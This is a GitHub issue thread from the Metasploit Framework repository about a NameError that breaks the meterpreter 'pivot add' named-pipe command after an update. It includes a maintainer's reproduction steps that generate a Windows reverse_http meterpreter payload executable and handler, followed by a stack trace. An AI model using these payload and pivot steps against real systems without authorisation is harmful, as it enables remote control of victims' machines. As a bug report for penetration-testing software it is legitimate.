### ISSUE TITLE
Pivot erroring out after update

### ISSUE THREAD

**Issue by naymikm** [rapid7/metasploit-framework#14026]
metasploit v6.0.2-dev- 
windows/x64/meterpreter/reverse_http
lport=8080
lhost=10.8.0.x (vpn)

meterpreter > pivot add -t pipe -l 192.168.152.101 -n mypipe -a x64 -p windows
[-] Error running command pivot: NameError uninitialized constant Rex::Post::Meterpreter::Pivot::TLV_TYPE_PIVOT_STAGE_DATA_SIZE

Same result for other machines on the vpn net as well

**Comment by naymikm** [comment]
Can confirm reverting back to previous apt version and it works again.

apt-get install metasploit-framework=5.0.101-0kali1 -V

**Comment by adfoster-r7** [comment]
Confirmed with the same steps, generating payload and handler:

```
use payload/windows/x64/meterpreter/reverse_http
set LHOST 192.168.222.1
set LPORT 4443
set SessionCommunicationTimeout 0
set ExitOnSession false
# Create the executable tun on on the VM
generate -o reverse_windows.exe -f exe
# Create listener
to_handler
```

Log Dump:

```
[08/20/2020 14:18:26] [e(0)] meterpreter: Error running command pivot: NameError uninitialized constant Rex::Post::Meterpreter::Pivot::TLV_TYPE_PIVOT_STAGE_DATA_SIZE
[08/20/2020 14:18:26] [d(0)] meterpreter: Call stack:
/Users/adfoster/Documents/code/metasploit-framework/lib/rex/post/meterpreter/pivot.rb:128:in `create_named_pipe_listener'
/Users/adfoster/Documents/code/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:297:in `pivot_add_named_pipe'
/Users/adfoster/Documents/code/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:273:in `cmd_pivot'
/Users/adfoster/Documents/code/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:523:in `run_command'
/Users/adfoster/Documents/code/metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:105:in `run_command'
/Users/adfoster/Documents/code/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:474:in `block in run_single'
/Users/adfoster/Documents/code/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `each'
/Users/adfoster/Documents/code/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `run_single'
/Users/adfoster/Documents/code/metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:68:in `block in interact'
/Users/adfoster/Documents/code/metasploit-framework/lib/rex/ui/text/shell.rb:153:in `run'
/Users/adfoster/Documents/code/metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:66:in `interact'
/Users/adfoster/Documents/code/metasploit-framework/lib/msf/base/sessions/meterpreter.rb:583:in `_interact'
/Users/adfoster/Documents/code/metasploit-framework/lib/rex/ui/interactive.rb:51:in `interact'
/Users/adfoster/Documents/code/metasploit-framework/lib/msf/ui/console/command_dispatcher/core.rb:1567:in `cmd_sessions'
/Users/adfoster/Documents/code/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:523:in `run_command'
/Users/adfoster/Documents/code/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:474:in `block in run_single'
/Users/adfoster/Documents/code/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `each'
/Users/adfoster/Documents/code/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `run_single'
/Users/adfoster/Documents/code/metasploit-framework/lib/rex/ui/text/shell.rb:158:in `run'
/Users/adfoster/Documents/code/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/Users/adfoster/Documents/code/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
./msfconsole:23:in `<main>'
```

**Comment by adfoster-r7** [comment]
@naymikm I'm just looking into this currently, and have replicated the error. Just to help with us with verification before shipping the required fix - what version of windows were you targeting?

**Comment by naymikm** [comment]
@adfoster-r7 I was running it against Windows 10 and yes I successfully got a connect back from the reverse_named_pipe with complete meterpreter functionality after reverting to 5.0.101. Thanks!
